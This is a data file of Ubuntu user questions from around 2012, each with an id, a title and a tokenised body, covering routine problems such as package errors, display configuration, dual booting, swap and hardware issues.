207681	problem bash completion apt-get 12.10	i 've got an annoying problem with completion and sudo apt-get . to give an example : $ sudo apt-get in [ tab ] [ tab ] in intel_bios_reader includeres intel_disable_clock_gating indicator-multiload intel_dpio_read info intel_dpio_write infobrowser intel_error_decode infocmp intel_forcewaked infokey intel_gpu_abrt infotocap intel_gpu_time inimf intel_gpu_top init intel_gtt init-checkconf intel_l3_parity initctl intel_reg_checker initctl2dot intel_reg_dumper initex intel_reg_read inkscape intel_reg_snapshot inkview intel_reg_write inputattach intel_sprite_on insmod intel_stepping install intel_upload_blit_large install-docs intel_upload_blit_large_gtt installfont-tl intel_upload_blit_large_map install-info intel_upload_blit_small installkernel interdiff -- more -- while is working right both with just apt-get or doing it in root : $ apt-get in [ tab ] stall $ sudo -i [ sudo ] password for davide : root @ brenna : ~ # apt-get in [ tab ] stall so the problem is using autocompletion after sudo ? not really , because $ sudo apt- [ tab ] [ tab ] apt-add-repository apt-extracttemplates apt-key apt-cache apt-file apt-mark apt-cdrom apt-ftparchive apt-sortpkgs apt-config apt-get summing up , the problem seems to be using sudo and auto-completion for programs options together . any good advice for that ?
207682	registering attendance to ubuntu developers summit in copenhagen	i have registered to attend the upcoming developers summit in copenhagen . i am trying to register as an attendant to events like this , and despite the fact that i login normally with my launchpad account when i am trying to proceed i am getting these information and getting forwarded to login page . any ideas ? authorization is required to access http : //pad.ubuntu.com/uds-r-get-started-with-ubuntu-development either you have not been granted access to this resource or your entitlement has timed out . please try again . you are currently logged in as https : //login.ubuntu.com/+id/foobar . ( logout )
207683	unable to log in to my account	this is weird , i was reading some blog and i found that i can manually start gui by issuing this command sudo startx , so i did that.now i 'm unable to login to my user account .
207685	is it possible to place windows with keyboard shortcuts in xfce ?	with compiz in unity , i could press ctrl+alt+6 to place a window on the right-half of the screen , ctrl+alt+4 to place it on the left half , ctrl+alt+7 to place it in the top left quarter of the screen , and so on . is there something similar in xfce on xubuntu ?
207691	how to set up u1 account after not receiving verification code ?	i did not receive the verification code to complete the setup of my ubuntu one account . what can i do to get it set up now ?
207695	ca n't install software , dpkg returns error while processing python3-distupgrade	installation of software results in the following error : processing triggers for desktop-file-utils ... setting up python3-distupgrade ( 1:0.190.2 ) ... could not import runpy module traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 289 , in < module > main ( ) file `` /usr/bin/py3compile '' , line 283 , in main process.communicate ( ) file `` /usr/lib/python3.2/subprocess.py '' , line 809 , in communicate self.stdin.close ( ) ioerror : [ errno 32 ] broken pipe error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 12 , in < module > import subprocess , tempfile , os.path , re , pwd , grp , os eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 289 , in < module > main ( ) file `` /usr/bin/py3compile '' , line 283 , in main process.communicate ( ) file `` /usr/lib/python3.2/subprocess.py '' , line 809 , in communicate self.stdin.close ( ) ioerror : [ errno 32 ] broken pipe dpkg : error processing python3-distupgrade ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of ubuntu-release-upgrader-core : ubuntu-release-upgrader-core depends on python3-distupgrade ( = 1:0.190.2 ) ; however : package python3-distupgrade is not configured yet . dpkg : error processing ubuntu-release-upgrader-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-release-upgrader-gtk : ubuntu-release-upgrader-gtk depends on ubuntu-release-upgrader-core ( = 1:0.190.2 ) ; however : package ubuntu-release-upgrader-core is not configured yet . ubuntu-release-upgrader-gtk depends on python3-distupgrade ( = 1:0.190.2 ) ; however : package python3-distupgrade is not configured yet . dpkg : error processing ubuntu-release-upgrader-gtk ( -- configure ) : dependency problems - leaving unconfigured setting up geany-common ( 1.22+dfsg-2 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . setting up geany ( 1.22+dfsg-2 ) ... errors were encountered while processing : python3-distupgrade ubuntu-release-upgrader-core ubuntu-release-upgrader-gtk e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 'sudo dpkg -- configure -a did n't solve the problem . how can i fix this ?
207701	how can i recover my data after installing 12.04 over windows 7 ?	i was using windows 7 and had 250gb hard disk which were divided in many drives . i lost all the data on disk after installing ubuntu . can i get my old data back ?
207702	unity menus do n't display properly	posted this a while back on the ubuntu forums , but never got a reply , and i still have n't found a way to fix it myself . i just upgraded from ubuntu 12.04 to 12.10 . or some reason , menus ( file , edit , etc ) are n't displaying properly . specifically , the text is almost unreadable because it is nearly thesame color as the background ( though for some reason it acts differently for different menus , as shown below . pictures ( i 'm a new user , so i ca n't post pic : the ones with the darker text ca n't be clicked on because nothing is selected to use them on . the lighter ones ( almost invisible against the white background ) are clickable . this problem also exists with the buttons on notification dialog boxes , though i do n't have a screenshot . any suggestions on how to fix this ? i 'm running unity on ubuntu 12.10
207705	gnome shell : show skype icon	i need to show icons for skype , empathy and dropbox in my system tray ( top side ) . i 've read about gnome shell extension to show icons in my system tray on the different websites , but this is n't working for me . i am using : ubuntu 12.10 + gnome shell 3.6.1 these instructions have n't helped me ( perhaps it was a problem in backwards compatibility changes in gnome shell version ) .
207709	ubuntu 12.04 wifi hotspot ca n't provide internet for 2 devices simultaneously	the problem is in the title.. i 'm using an old laptop to distribute the internet connection . the hotspot was created easily , and i can connect one device at a time , and use the internet provided by the old laptop . if i connect 2 devices , both of them loose internet connection , and the wifi keeps disconnecting . is it a hardware problem ? ( weaker ( ? ) wifi card , although i tested with 2 of them , or over all poor performance of the laptop ( is a toshiba qosmio f20-132 ) ) . or some kind of bad configuration ? this is something to use sporadically , i do n't intend to buy an access point , so any comment regarding this is kinda of useless , but thank you .
207712	why are there two versions of boost and which does ubuntu use ?	maybe this is to do with my lack of knowledge when it comes to ubuntu repositories but i 'm trying to understand which versions of boost ubuntu has available and which version is best to use . when reading the description of the libboost-all-dev package it says `` boost version ( currently 1.46 ) '' but the version i 've installed reports version 1.48.0.2 . installing libboost-all-dev got me boost packages which all seem to be version 1.46.1-7ubuntu3 ( precise ) but i 've noticed other boost packages with a version of 1.48.0-3 ( precise ) . could someone explain to me which version of boost a vanilla install of ubuntu comes with ( or perhaps how to find out which version of boost comes with a vanilla install of any particular version of ubuntu ) without having to perform an install ? and if anyone happens to know , why does the libboost-all-dev package report a different version from its description but seems actually get the version from the description , not those which correspond with its version ?
207714	keyboard does not work after reboot	i was running an ubuntu 12.04 , which i later upgraded to ubuntu 12.10 in the hopes of fixing my problem , which is as follows : when i turn on the notebook , a toshiba of the satellite series , sometimes ( not always , no specific pattern to be found ) the keyboard will not work at all . not the keystrokes and not the num/caps-lock keys . it just wont accept any input at all . also there is no use in pressing a key really long in order to fix the problem . the problem is that i am an absolute ubuntu beginner , so i do n't even know where to start to fix it . is there any way to reinstall the drivers or something similar ? anyone with the same problem . thank you very much , luke
207715	problem in booting windows vista after repairing using a boot repair disk	been using vista and i recently installed ubuntu 11 in a separate hard disk ( in bios , this hard disk was set for the 'boot from ' option ) ..apart from the partitions used for ubuntu , there are 2 more partitions ( ntfs ) in that hard disk..then i installed windows 7 on one of those partitions ( just to see which windows operating system i 'd like to keep on using , along with ubuntu ) ..but after installing windows 7 , the os selection menu did n't appear anymore and had to fix it using the boot-repair-disk ... it kinda worked.. now the os selection menu is displayed.. but whenever i select vista , it boots windows 7 ... any thoughts on how to fix this ? here 's the link to the log generated by boot repair > > http : //paste.debian.net/202691 i 'm new to ubuntu btw..
207716	ubuntu 12.10 - resolution stuck at 1024x768 using open source radeon driver	i 'm using ubuntu 12.10 with an ati radeon hd5670 card . i currently have the open source xorg-edgers driver . i 've been using this driver interchangeably with the radeon open source driver since fglrx seems to give me a lot of freezes . so i ca n't really use proprietary drivers , the radeon driver seems to be stable for me , the resolution is the only problem . the resolution is stuck at 1024x768 , where my monitor 's native resolution is 1366x768 . how do i enable that resolution ? going to system settings > display only gives me 800x600 and 1024x768 by the way . and just another question , how do i know if xorg-edgers driver is enabled ? when i run sudo lshw -c video , i still see the radeon driver . configuration : driver=radeon latency=0 thanks a lot in advance ! update : running xrandr gave me this : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 .. dvi-0 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm so following the guide , i typed in the following : cvt 1366 768 60 xrandr -- newmode `` 1366x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr now gives me this line : 1366x768_60.00 ( 0x178 ) 85.2mhz but i 'm still not able to execute the add command xrandr -- add-mode dvi-0 1366x768 , it just shows me the usage page for xrandr .
207717	rotating one screen with xinerama in a multihead setup	i have a dual-head setup : a `` main '' screen at 1920x1080 , and a `` secondary '' screen to the right of it , rotated at 90 degrees counter-clockwise . until friday ( 26.10.2012 ) , everything was working fine , however on that day an update has caused the rotation settings in xorg.conf to be ignored . specifically , i had used the rotation attribute ( like in this question ) . also , since i have xinerama enabled , i do n't have access to xrandr and the corresponding gui settings ( due to this bug , i think ) . what should i change in my xorg.conf to have the second screen rotated again ? here 's my current xorg.conf ( the third screen is a monitor built in into the laptop , disabled since my video card can only support 2 outputs ) . i have n't removed any comments to provide a possible forensic trace . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.37 ( buildd @ allspice ) sun sep 9 05:59:26 utc 2012 # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` mouse0 '' # driver `` mouse '' # option `` protocol '' `` auto '' # option `` device '' `` /dev/psaux '' # option `` emulate3buttons '' `` no '' # option `` zaxismapping '' `` 4 5 '' # endsection # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` keyboard0 '' # driver `` kbd '' # endsection section `` serverlayout '' # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # inputdevice `` keyboard0 '' `` corekeyboard '' # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # inputdevice `` mouse0 '' `` corepointer '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` true '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` 1 '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` 1 '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 1920 0 screen 1 `` screen1 '' leftof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` samsung smbx2235 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung smbx2235 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 330m '' option `` randrrotation '' `` on '' busid `` pci:2:0:0 '' screen 0 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 330m '' option `` randrrotation '' `` on '' busid `` pci:2:0:0 '' screen 2 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 330m '' option `` randrrotation '' `` on '' busid `` pci:2:0:0 '' screen 1 endsection section `` screen '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : 1366x768_60 +277+1080 , dfp-1 : 1920x1080 +0+0 ; dfp-0 : 1024x768 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 1024x768i +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 960x540 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 840x525 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 832x624 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x600 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x600_75 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x600_72 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x600_60 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x600_56 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 800x512 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 720x450 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 720x400 +0+1080 , dfp-1 : nvidia-auto-select +0+0 ; dfp-0 : 700x525 +0+1080 , dfp-1 : nvidia-auto-select +0+0 '' # removed option `` twinview '' `` 0 '' # removed option `` twinviewxineramainfoorder '' `` crt-0 '' # removed option `` metamodes '' `` crt : 1440x900 +0+0 '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +277+1080 , dfp-1 : 1920x1080 +0+0 ; dfp-1 : 1024x768i +0+0 ; dfp-1 : 960x540 +0+0 ; dfp-1 : 840x525 +0+0 ; dfp-1 : 832x624 +0+0 ; dfp-1 : 800x600 +0+0 ; dfp-1 : 800x600_75 +0+0 ; dfp-1 : 800x600_72 +0+0 ; dfp-1 : 800x600_60 +0+0 ; dfp-1 : 800x600_56 +0+0 ; dfp-1 : 800x512 +0+0 ; dfp-1 : 720x450 +0+0 ; dfp-1 : 720x400 +0+0 ; dfp-1 : 700x525 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinviewxineramainfoorder '' `` dfp-1 , crt-0 '' option `` twinview '' `` 0 '' option `` rotate '' `` cw '' option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt : 1680x1050 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` dfp-1 : 1920x1080 +0+0 '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-1 , crt-0 '' option `` metamodes '' `` dfp-1 : 1920x1080 +0+0 ; dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` crt : 1440x900 +0+0 '' # removed option `` twinviewxineramainfoorder '' `` crt-0 '' # removed option `` metamodes '' `` dfp-0 : 1366x768_60 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768i +0+0 ; dfp-0 : 960x540 +0+0 ; dfp-0 : 840x525 +0+0 ; dfp-0 : 832x624 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_75 +0+0 ; dfp-0 : 800x600_72 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 800x600_56 +0+0 ; dfp-0 : 800x512 +0+0 ; dfp-0 : 720x450 +0+0 ; dfp-0 : 720x400 +0+0 ; dfp-0 : 700x525 +0+0 '' # removed option `` metamodes '' `` dfp-1 : 1920x1080 +0+0 ; dfp-1 : 1024x768i +0+0 ; dfp-1 : 960x540 +0+0 ; dfp-1 : 840x525 +0+0 ; dfp-1 : 832x624 +0+0 ; dfp-1 : 800x600 +0+0 ; dfp-1 : 800x600_75 +0+0 ; dfp-1 : 800x600_72 +0+0 ; dfp-1 : 800x600_60 +0+0 ; dfp-1 : 800x600_56 +0+0 ; dfp-1 : 800x512 +0+0 ; dfp-1 : 720x450 +0+0 ; dfp-1 : 720x400 +0+0 ; dfp-1 : 700x525 +0+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-1 , crt-0 '' option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-1 : 1920x1080 +0+0 ; dfp-1 : 800x600 +0+0 ; dfp-1 : 800x600_75 +0+0 ; dfp-1 : 800x600_72 +0+0 ; dfp-1 : 800x600_60 +0+0 ; dfp-1 : 800x600_56 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
207718	how to open system > administration ?	i 'm new to ubuntu and while browsing over forums i saw goto system > administration and so on . so i wan na know how i can actually goto system , means where can i find system then administration and so on ?
207722	12.10 system with optimus , bumblebee and nvidia current wont install	i have a system with the optimus technology , when i try to install bumblebee-nvidia , i receive a message saying that i am missing nvidia-current ( > = 260.19.12~ ) so , i go on and try to install nvidia-current . now it is the xorg-video-abi-11 that is missing and that it can not be installed . ok so i do a little search only to find out that xorg-video-abi-11 is part of xserver-xorg-core , obviously , it is already installed but i try to reinstall it and no luck , it only say it is already to the newest version ... . anyone have ideas ?
207724	how to install the latest gmp library in 12.04 ?	i know it should be of the form `` sudo apt-get install `` . but what should be the name of the library ? and after installing , how to verify that it has been installed correctly .
207728	12.04 server on home network	i need advice to help me with a server install , i 'm new to ubuntu and linux in general . i have 6 systems in my house , 5 being windows 7 and this laptop that i am typing on is linux mint 13 maya . question is , my wife will not transition to anything . she is stuck in gates-land . so , can i make a server with ubuntu 12.04 ( burnt disc image last night ) so that all systems in my home can access and my mother-in-law in another state can also access with a username ? that would be awesome and it may convince the war dept ( my wife ) to change all the systems in my house to ubuntu/linux . sorry this is so long winded , but all the questions i have seen on this forum do n't answer it completely .
207731	dual boot ubuntu 12.10 and linux mint 13	i know this question has been asked so many times , but i do n't know what should i do in my case with those tutorials available everywhere . this is how my current situation looks like : right now i 'm using linux mint 13 xfce installed with : 500mb of /boot 2gb of swap 15gb of / the rest of my space is /home with no space left in my hard drive and i just got a ubuntu 12.10 live cd from my friend , and i intended to install it alongside my linux mint . and i want to select something else in the installation process . the question is : i want to use the same /home partition for ubuntu and linux mint with same user but different directory because i do n't want my configuration files conflict with each other . for example my username is budiman and i want a directory named /home/budiman-ubuntu for ubuntu and /home/budiman-linuxmint for linux mint . how can i do that ? i read it somewhere said that i can share /boot and swap with multiple distro , is it true ? how can i make another /root directory for ubuntu since i do n't have any space left in my hard drive ? can i resize the /home partition without losing my data ? how can i do that if it 's possible ? now i 've used 10-20 % of my /home partition . i really hope somebody can help me with my question , if possible with a full tutorial starting from install with something else step until completion of the process . thanks before : )
207733	why does my laptop with amd radeon hd 76xx graphics get overheated when using ubuntu ?	i bought a new laptop which came pre-installed with windows 7 . i love working on ubuntu and hence installed 12.04 on my laptop . i can work on windows for 6 hours at a stretch and feel the laptop being only slightly warm , but 15 minutes into running ubuntu and my laptop is too hot . the battery also drains out very quickly on ubuntu . 1.5 hrs of backup on ubuntu compared to 5-6 hrs on windows . i previously owned a dell inspiron n5010 and everything ran smoothly on that . no heating issues . it came with intel i3 processor . so i 'm wondering whether this problem has something to do with the processor ? ( amd a8 ) specs : hp pavilion g6-2005ax laptop ( apu quad core a8/ 4gb/ 500gb/ win7 hb/ 1.5gb graph ) 1 gb amd radeon hd 7670m dedicated 512 mb amd radeon hd 7640g graphics integrated i 've already installed ati proprietary drivers suggested by ubuntu . but sensors temperature is 70 deg c. is there any fix for this problem ?
207735	both 12.10 & 12.04 installation freeze	a friend of mine is having problems installing ubuntu . we 've tried both 12.10 and 12.04 ver . but each time we get and then we got stuck . his comp is : motherboard : asus p5g41-m lx cpu : pentium ( r ) dual-core cpu e6500 @ 2.93ghz disk : disk 500.1 gb samsung hd502hj ram : slot 1 ddr2 ( pc2-6400 ) 2048 mb kingston slot 2 ddr2 ( pc2-6400 ) 2048 mb hyundai electronics graph card : nvidia geforce gt 240 any solution for this ?
207736	how will updates be applied to the nexus 7 ubuntu release ? will refreshing the device be necessary ?	updating android is usually a hassle and requires flashing an update via rom manager or the like . i 'm fantasizing about the beauty of being able to take daily ubuntu patches and updated kernels via apt . is this a reality or does the platform require ubuntu to repackage new roms/ go back through the desktop installer for every release ?
207737	how to install older ruby version on ubuntu precise pangolin ?	i got a present : older rails tutorials that needs old ruby version . i try to install ruby-1.8 with the packet manager . i still got problems with the tutorial example code . next i try rvm to install the old ruby version . unfortunately i got an error . i do not know what to do . i search the internet . many people got no problems with rvm . rvm use *error : branch origin/ruby_1_8_4 not found . * and *error : error running 'gem_path= '' /usr/share/ruby-rvm/gems/ruby-1.8.4- tv1_8_4 : /usr/share/ruby-rvm/gems/ruby-1.8.4-tv1_8_4 @ global : /usr/share/ruby- rvm/gems/ruby-1.8.4-tv1_8_4 : /usr/share/ruby-rvm/gems/ruby-1.8.4-tv1_8_4 @ global '' gem_home= '' /usr/share/ruby-rvm/gems/ruby-1.8.4-tv1_8_4 '' `` /usr/share/ruby- rvm/rubies/ruby-1.8.4-tv1_8_4/bin/ruby '' `` /usr/share/ruby-rvm/src/rubygems- 1.3.7/setup.rb '' ' , please read /usr/share/ruby-rvm/log/ruby-1.8.4- tv1_8_4/rubygems.install.log* please give me a hint .
207739	xfce : some notifications not disappearing	some of my notifications on xfce are not disapearing ( especially those from jupiter ) automatically . timeout is set to 5 seconds and i can manually close them . what 's happening ? i 'm using xubuntu 12.10 , /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
207741	fan speed in 12.10 too loud	when my pc boots up the fan speed whirls like a beast even when browsing the bios , settings , etc , which is fair enough . previously when i was using windows it used to calm down as soon as it boots into it . however , it does n't calm down when it boots into ubuntu 12.10 .
207743	how to disable sliding login screen in gnome ?	i am using gnome 3.6 and i am quite annoyed by the login screen when my computer wakes up . the new implementation in gnome includes two steps . first you have to hit esc or click and drag upward ( slide ) , so the big clock disappears , and then enter your credentials . i am interested in removing the first part .
207744	upgrade problem	an unresolvable problem occurred while calculating the upgrade : the package 'unity ' is marked for removal but it is in the removal blacklist . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . what shall i do ? do i need to remove untiy from blacklist but how ?
207761	ubuntu will suspend but wo n't wake up	i installed ubuntu 12.10 on an apple macbook pro 9,1 mid 2012 15inch non retina . suspend suspends it but when i open the lid , it does n't wake up . i tried pressing ctrl + alt + f1 but nothing works . only the keyboard backlight switches on . what 's the issue ? moreover , i 'm using the x org nouveau driver and not the official nvidia one . please help . it is irritating to shut the laptop down every time .
207763	is ubuntu 12.04 grub version compatible with windows 8 ?	i want to install windows 8 and ubuntu 12.04 lts and i want to know if i wo n't have any trouble with windows 8 on grub .
207765	error : file not found without any grub menu	i installed kubuntu on the third partition and removed my ubuntu partition , which was the second one before . unlike this question , i am not seeing any grub menus before shall i do the same ? i just installed kubuntu and got this wonderfull message during the first startup error : file not found grub rescue >
207767	no swap after moving/resizing partitions	i recently did a fresh install of ubuntu 12.04 andpurposly got rid of my windows partition and my original swap partition in the process . now my system wo n't see any swap space . my partition table is set up like this : /dev/sda2 ext4 459.24gb ( main ubuntu partition ) /dev/sda1 linux-swap 6.52gb ( unrecognized swap space ) i even ran the free command in the terminal and it would n't see anything : _zach @ skynet : ~ $ free total used free shared buffers cached mem : 4048624 1782908 2265716 0 42332 709264 -/+ buffers/cache : 1031312 3017312 swap : 0 0 0 zach @ skynet : ~ $ so my question is , what can i do to get my system to recognize my swap ?
207770	what can i do with maas without juju	i have short questions about maas . is this maas like beowulf cluster ? is it provides more power with nodes ? what can i do with maas without juju ? can i use like desktop ?
207772	licence error for matlab 2012a on ubuntu 12.04 ( 64-bit )	i have installed matlab 2012a on ubuntu 12.04 , while providing the licence i find the following error : could not complete activation because the license file could not be written to disk . you might not have write permission on the license file or the folder . /usr/local/matlab/r2012a/licenses/license_malhar-pc_161052_r2012a.lic see your system administrator for assistance . the specific error message text is : /usr/local/matlab/r2012a/licenses/license_malhar-pc_161052_r2012a.lic ( no such file or directory ) .
207776	e : unable to locate package usb_modeswitch	i am using ubuntu 12.04 and have been trying to get it to detect my micromax data card . i have been trying to install usb_modeswitch , but i keep getting the follow error - e : unable to locate package usb_modeswitch i also tried editing the etc/apt/sources.list and added the following : deb http : //archive.ubuntu.com/ubuntu/ maverick main restricted universe deb-src http : //archive.ubuntu.com/ubuntu/ maverick main restricted universe still no improvement . what am i not doing right ? any help will be appreciated . thanks in advance !
207777	upgrade to 12.10 option not showing up un update manager	the option to upgrade to 12.10 is n't popping up in update mananger . something special i have to do ?
207778	how to make kubuntu automatically switch between the laptop monitor and the external monitor when it 's plugged in ?	my installation of kubuntu 12.04 does not switch to the default external monitor when i plug in nor does it switch back to the laptop monitor ( intel hd 3000 ) when the external one is plugged out . both are recognized in the system settings - > display and monitors - > size and orientation . i can set the settings manually , but i want it to happen automatically . the hardware key does n't work if the machine woke up without the external monitor . any ideas ?
207779	i upgraded ubuntu to 12.10 , and the internet does not work on vbox	last week , i upgraded my operating system to ubuntu 12.10 from 12.04 , and the internet stopped working on two virtual machines ( launched with virtualbox ) , windows xp and osx snow leopard . osx also stopped working completely at first , but i fixed that by switching to the 64 bit option in the vbox settings . i switching to bridged networking from nat restored the internet to windows , but not to osx . does anybody know what i could be doing wrong ?
207789	dual booting windows 8	so i want to upgrade my windows 7 to windows 8 thing is holding me back is the ability to dual boot . will i be able to dual boot with windows 8 as i were with 7 , can i install 8 and ubuntu 12.10 and select at the boot menu as i were able in windows 7 thank you in advanced
207792	how do i change sound output from the green audio jack to the blue audio jack ?	well i am new to linux , but i have a little problem . my green audio jack died and i only have a blue and a pink audio jack wich both work under windows . the pink jack works but i do n't how to get the sound trough the blue jack . i 've tried ubuntu and kubuntu . none of them has worked .
207793	can i use live usb to format hd and install ubuntu with it ?	i 've tried to install ubuntu on my computer and now ca n't even turn it on . the problem is that the computer cd-rom is not working so i was trying to get it on a usb somehow . the computer is old and slow and was running windows xp ; 750 ram , 2.4gb , 40gb hdd . could that be a problem for ubuntu ? i tried to attached two pictures , first after bios noise and second ( and last thing i see ) but i ca n't . any idea what can i do ? i do n't want to use windows . is there a way to format hdd from usb and install ubuntu also from usb ?
207807	stuck on ubuntu logo	i installed ubuntu 12.10 along side my windows 7 . when it was done installing i restarted the computer and chose ubuntu from the boot loader and now when i goes to the purple screen with ubuntu logo and the dots under it , it just gets stuck there ... i 've left it alone for a long time and still nothing . any one got any ideas i can try ? thanks in advance .
207808	when will osmos and shatter be available for ubuntu 12.10 ?	when will osmos and shatter be available for ubuntu 12.10 ? both are only available for 12.04 .
207811	wine wo n't install although i 've never installed it before . ( 12.10 )	for some reason , whenever i try to install wine it says that the packages are corrupt : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . please help . thanks in advance : )
207812	can not create password for account without one .	i have a standard account with no password , then in the terminal it aksed for my password to install a program , i tried just enter and the adminstrators password but none worked , then i tried to create a password but i ca n't cause it says that the current password is wrong , but i have n't made a password yet ! what 's going on ? any ideas ?
207813	why does a ubuntu guest in virtualbox run very , very slowly ?	i 'm using currently ubuntu 12.04 lts as a host machine , and i 've virtualized three machines : a xubuntu 12.04 guest a windows 7 guest a ubuntu 12.10 guest all the guests have the same virtualbox default settings , but ubuntu 12.10 is slower ! the installation took 1h 40 min ! ( normally , it takes 40 minutes . ) now it is impossible to use it , and all operations are very , very slow . i 'm using virtualbox version 4.2.4 . any ideas ? why is it slow ? and how can i make it faster ?
207815	ubuntu 10.10 - 12.04 graphical glitches	when i try to install ubuntu 12.04 on my computer and i log in , everything is just ... glitchy , and i have to re-install ubuntu 10.04 off of a disk i have . this may have something to do with my drivers , as when i tried to turn wireless on it promted me to install some drivers . i did n't , and that may have been my doom when
207816	`` timeout was reached '' error when opening file with gvim	i am new to linux ubuntu 12.04 . every time i open a file with the gvim editor it gives me following warning : ** ( gvim:4620 ) : warning ** : unable to create ubuntu menu proxy : timeout was reached what should i do to solve this problem ?
207819	high power consumption on latest versions of linux distributions	i have a sony vaio e series and i installed both ubuntu 12.04 and 12.10 . in every case , my battery life is reduced of almost a half with respect to windows 7 . the power consumption with no program running is around 18 w , opening firefox or thunderbird goes over 30 ! i have tried laptop-mode-tools and jupiter , tweaks on the kernel suggested on the ubuntu website here , but nothing changed . i ran powertop , but before studying to understand what it says i read about some linux regression problems on power consumption . in fact , i have the same problem with fedora 17 and opensuse 12.2 on this laptop . my brother has an acer and he has the same problem . so , i 'd like to know if other people have the same issue , or it is just related to some machines . thank you !
207821	trying to install ubuntu and getting `` no child node detected '' ?	i 'm trying to install ubuntu on my asus windows 7 laptop . i used pendrive to make my usb stick bootable , and then i changed my bios to launch from usb 2.0 ( pmax ? is that right ? ) , but when it boots now it comes up saying `` no child node detected . '' any ideas ? i tried using the windows installer but after i selected ubuntu after the restart , it came up with a message basically saying that i could n't do it .
